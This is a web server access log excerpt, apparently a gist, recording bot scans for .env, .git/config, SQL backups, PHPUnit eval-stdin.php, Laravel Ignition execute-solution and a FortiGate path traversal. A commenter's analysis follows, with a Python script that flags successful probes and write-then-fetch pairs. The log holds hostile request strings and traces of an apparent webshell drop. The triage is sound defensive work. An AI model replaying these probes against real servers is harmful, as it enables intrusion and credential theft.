34.77.127.183 - - [22/Feb/2023:21:01:43 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
20.225.133.97 - - [23/Feb/2023:02:29:24 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
34.140.248.32 - - [23/Feb/2023:06:21:21 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
212.87.204.214 - - [23/Feb/2023:06:53:03 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.25.1"
34.78.6.216 - - [23/Feb/2023:20:46:47 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
34.78.6.216 - - [24/Feb/2023:04:57:13 +0000] "GET / HTTP/1.1" 400 264 "-" "python-requests/2.28.2"
35.195.93.98 - - [24/Feb/2023:06:12:35 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
185.224.128.219 - - [24/Feb/2023:12:37:23 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [24/Feb/2023:12:43:47 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 400 264 "-" "python-requests/2.22.0"
185.224.128.219 - - [24/Feb/2023:12:51:15 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
35.195.93.98 - - [24/Feb/2023:20:31:19 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
195.133.40.25 - - [25/Feb/2023:00:42:29 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
195.133.40.25 - - [25/Feb/2023:00:42:29 +0000] "GET /demo/.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
195.133.40.25 - - [25/Feb/2023:00:42:29 +0000] "GET /dev/.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
195.133.40.25 - - [25/Feb/2023:00:42:30 +0000] "GET /web/.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
195.133.40.25 - - [25/Feb/2023:00:42:30 +0000] "GET /api/.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
195.133.40.25 - - [25/Feb/2023:00:42:30 +0000] "GET /admin/.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
195.133.40.25 - - [25/Feb/2023:00:42:31 +0000] "GET /app/.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
20.225.133.97 - - [25/Feb/2023:05:41:58 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
34.76.158.233 - - [25/Feb/2023:06:02:44 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
109.206.241.102 - - [25/Feb/2023:06:59:17 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.1"
35.188.61.231 - - [25/Feb/2023:09:31:56 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
217.138.222.100 - - [25/Feb/2023:14:24:06 +0000] "GET /db.sql HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
34.76.96.55 - - [25/Feb/2023:20:18:20 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
34.76.96.55 - - [26/Feb/2023:06:03:09 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
20.225.133.97 - - [26/Feb/2023:09:06:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 1931 "-" "python-requests/2.28.2"
20.225.133.97 - - [26/Feb/2023:10:06:57 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 162 "-" "python-requests/2.28.2"
212.87.204.214 - - [26/Feb/2023:12:16:54 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.25.1"
85.209.135.214 - - [26/Feb/2023:12:36:19 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.25.1"
185.224.128.219 - - [26/Feb/2023:13:57:38 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [26/Feb/2023:14:03:39 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 400 264 "-" "python-requests/2.22.0"
185.224.128.219 - - [26/Feb/2023:14:13:49 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
34.76.96.55 - - [26/Feb/2023:18:42:48 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
130.211.54.158 - - [26/Feb/2023:19:50:05 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
35.195.93.98 - - [27/Feb/2023:01:36:45 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
185.225.73.68 - - [27/Feb/2023:01:39:06 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
45.134.144.119 - - [27/Feb/2023:04:35:07 +0000] "GET ///remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1" 404 134 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.el7.x86_64"
35.233.62.116 - - [27/Feb/2023:06:01:52 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
34.78.120.99 - - [27/Feb/2023:08:02:07 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
149.102.246.19 - - [27/Feb/2023:11:30:03 +0000] "GET /backup.sql HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.225.74.39 - - [27/Feb/2023:14:21:03 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.225.74.39 - - [27/Feb/2023:14:21:04 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.225.74.39 - - [27/Feb/2023:14:21:04 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.225.74.39 - - [27/Feb/2023:14:21:04 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.225.74.39 - - [27/Feb/2023:14:21:06 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.225.74.39 - - [27/Feb/2023:14:21:06 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
138.199.46.14 - - [27/Feb/2023:15:06:54 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
34.76.96.55 - - [27/Feb/2023:19:41:08 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
35.195.93.98 - - [28/Feb/2023:05:51:38 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
34.77.127.183 - - [28/Feb/2023:05:56:42 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
34.78.6.216 - - [28/Feb/2023:07:20:36 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
149.102.246.19 - - [28/Feb/2023:09:35:32 +0000] "GET /backup2.sql HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.224.128.219 - - [28/Feb/2023:18:00:21 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [28/Feb/2023:18:07:54 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 400 264 "-" "python-requests/2.22.0"
185.224.128.219 - - [28/Feb/2023:18:15:31 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
35.233.62.116 - - [28/Feb/2023:19:21:08 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
34.76.96.55 - - [01/Mar/2023:05:43:45 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
157.230.243.253 - - [01/Mar/2023:18:14:50 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580678 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:14:50 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:14:50 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:14:50 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 614350 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:14:50 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580968 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:14:50 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 198316 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "GET /servers.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "GET /storage/servers.php HTTP/1.1" 200 58 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "GET /asu.php?0day=52.37.113.80/lottery/in HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "GET /suw.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "GET /id.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "GET /fuyuh.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "GET /canary.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:13 +0000] "GET /can.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
35.233.62.116 - - [01/Mar/2023:19:19:29 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
171.22.30.113 - - [01/Mar/2023:19:35:07 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.1"
130.211.54.158 - - [02/Mar/2023:05:36:23 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
45.134.144.119 - - [02/Mar/2023:06:43:52 +0000] "GET ///remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1" 404 134 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.el7.x86_64"
193.56.29.180 - - [02/Mar/2023:09:53:04 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.25.1"
185.224.128.219 - - [02/Mar/2023:18:48:58 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
34.140.248.32 - - [02/Mar/2023:18:51:59 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
185.224.128.219 - - [02/Mar/2023:19:04:26 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 400 264 "-" "python-requests/2.22.0"
185.224.128.219 - - [02/Mar/2023:19:09:38 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
34.77.127.183 - - [03/Mar/2023:05:36:11 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
209.145.49.145 - - [03/Mar/2023:06:14:31 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 178 "-" "python-requests/2.28.2"
20.14.93.102 - - [03/Mar/2023:09:29:18 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:26 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:36 +0000] "GET /.env HTTP/1.1" 404 2316 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:37 +0000] "GET /.env HTTP/1.1" 200 1931 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:39 +0000] "GET /.env HTTP/1.1" 200 1931 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:39 +0000] "GET /.env HTTP/1.1" 404 116 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:43 +0000] "GET /.env HTTP/1.1" 200 411 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:46 +0000] "GET /.env HTTP/1.1" 404 116 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:46 +0000] "GET /.env HTTP/1.1" 503 1584 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:46 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:24:41 +0000] "POST / HTTP/1.1" 405 166 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:24:52 +0000] "POST / HTTP/1.1" 405 191756 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:24:52 +0000] "POST / HTTP/1.1" 405 166 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:24:54 +0000] "POST / HTTP/1.1" 405 166 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:24:55 +0000] "POST / HTTP/1.1" 404 112 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:24:59 +0000] "POST / HTTP/1.1" 405 25 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:25:01 +0000] "POST / HTTP/1.1" 404 112 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:25:02 +0000] "POST / HTTP/1.1" 503 1584 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:25:02 +0000] "POST / HTTP/1.1" 405 166 "-" "python-requests/2.28.2"
34.76.158.233 - - [03/Mar/2023:18:35:12 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
209.145.49.145 - - [03/Mar/2023:20:11:07 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"

@wize-wiz

wize-wiz commented Mar 8, 2023

Yea, it's a typical bot scanner; only the 200 requests are interesting though, as in the following files:

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/_ignition/execute-solution
/.env

from these requests:

128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
20.225.133.97 - - [26/Feb/2023:09:06:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 1931 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:37 +0000] "GET /.env HTTP/1.1" 200 1931 "-" "python-requests/2.28.2"

Where it's quite interesting that the same file requests throw a 404, some a 500 and some a 200. Because of the different sizes, I guess it has to do with the data being sent, but that doesn't explain the 404.
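Reading the log excerpt the way this reply does, two things stand out: the 200 responses on the probed paths, and the fact that in both the 20/Feb and 01/Mar bursts a 200 POST to /_ignition/execute-solution is followed in the same second, from the same IP, by a 200 GET of /storage/servers.php. The script below is an added example, not code from the thread, that does both checks over combined-format access log lines. The sample lines are copied from the log posted above (a ten-line subset); the 60-second window and the "any 200 GET of a .php file" heuristic are choices made for the example.

```python
import re
from datetime import datetime, timedelta

# Ten lines taken verbatim from the access-log excerpt posted in this thread.
SAMPLE_LOG = """\
20.110.249.240 - - [18/Feb/2023:15:54:43 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 198267 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /servers.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /storage/servers.php HTTP/1.1" 200 58 "-" "python-requests/2.18.4"
20.225.133.97 - - [26/Feb/2023:09:06:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 1931 "-" "python-requests/2.28.2"
157.230.243.253 - - [01/Mar/2023:18:14:50 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580678 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 198316 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "GET /storage/servers.php HTTP/1.1" 200 58 "-" "python-requests/2.18.4"
20.172.144.200 - - [03/Mar/2023:14:23:37 +0000] "GET /.env HTTP/1.1" 200 1931 "-" "python-requests/2.28.2"
"""

# Apache/Nginx "combined" format: ip ident user [time] "method path proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# The three paths singled out in the reply above.
PROBE_PATHS = {
    "/.env",
    "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "/_ignition/execute-solution",
}


def parse_log(text):
    """Parse combined-format lines; unparseable lines are dropped, query strings stripped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["status"] = int(e["status"])
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["path"] = e["path"].split("?", 1)[0]
        entries.append(e)
    return entries


def successful_probes(entries):
    """Requests to the watched paths that got a 200: the scanner noise is all 4xx/5xx."""
    return [e for e in entries if e["path"] in PROBE_PATHS and e["status"] == 200]


def write_then_fetch(entries, window_seconds=60):
    """Pair each 200 GET of a .php file with the most recent 200 POST to
    /_ignition/execute-solution from the same IP inside the window. One pair per
    fetch, so a burst of POSTs before one fetch yields a single finding."""
    last_post = {}
    pairs = []
    for e in entries:                       # log order is time order
        if e["method"] == "POST" and e["path"] == "/_ignition/execute-solution" and e["status"] == 200:
            last_post[e["ip"]] = e
        elif e["method"] == "GET" and e["path"].endswith(".php") and e["status"] == 200:
            post = last_post.get(e["ip"])
            if post and timedelta(0) <= e["ts"] - post["ts"] <= timedelta(seconds=window_seconds):
                pairs.append({"ip": e["ip"], "post_ts": post["ts"],
                              "fetched": e["path"], "fetch_ts": e["ts"]})
    return pairs


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    print(f"{len(successful_probes(entries))} successful probe responses")
    for p in write_then_fetch(entries):
        print(f"{p['ip']}: POST at {p['post_ts']:%H:%M:%S} then GET {p['fetched']} at {p['fetch_ts']:%H:%M:%S}")
```

On the sample this reports five successful probe responses and two write-then-fetch pairs (one per attacking IP), which matches the 20/Feb and 01/Mar bursts by eye. The 404 on /servers.php followed by 200 on /storage/servers.php in the same second is the scanner confirming which of its candidate paths actually landed, so the fetched path is also the first place to look on disk.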
